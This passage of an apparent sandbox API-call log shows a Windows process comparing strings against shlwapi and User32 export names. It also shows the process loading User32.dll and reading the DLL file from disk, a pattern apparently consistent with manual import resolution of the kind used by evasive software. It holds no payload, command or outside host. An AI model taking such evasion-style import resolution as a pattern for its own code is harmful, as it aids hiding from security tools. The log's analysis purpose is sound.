(lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0112.716] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0112.717] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0112.717] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0112.717] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0112.717] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0112.717] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0112.717] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0112.717] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0112.718] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0113.037] GetProcessHeap () returned 0x4f0000 [0113.037] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x4f0000) returned 1 [0113.037] GetProcessHeap () returned 0x4f0000 [0113.037] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509310 [0113.037] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0113.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0113.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0113.038] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0113.038] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0113.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0113.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0113.038] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0113.038] GetProcessHeap () returned 0x4f0000 [0113.038] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1555b8) returned 0x40b9040 [0113.043] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0113.043] ReadFile (in: hFile=0x17c, lpBuffer=0x40b9040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b9040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0113.061] CloseHandle (hObject=0x17c) returned 1 [0113.061] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0113.061] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0113.061] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0113.061] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0113.061] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0113.061] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0113.062] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0113.062] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0113.062] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0113.062] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0113.062] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0113.062] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0113.062] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0113.062] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0113.062] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0113.062] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0113.062] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0113.062] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0113.062] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0113.062] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0113.062] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0113.062] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0113.063] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0113.063] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0113.063] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0113.063] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0113.063] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0113.063] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0113.063] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0113.063] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0113.064] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0113.065] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0113.065] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0113.280] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0113.280] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0113.280] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0113.281] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0113.281] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0113.281] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0113.281] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0113.281] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0113.281] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0113.281] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0113.282] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0113.282] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0113.283] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0113.283] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0113.284] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0113.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0113.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0113.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0113.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0113.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0113.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0113.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0113.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0113.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0113.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0113.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0113.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0113.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0113.287] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0113.288] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0113.289] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0113.290] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 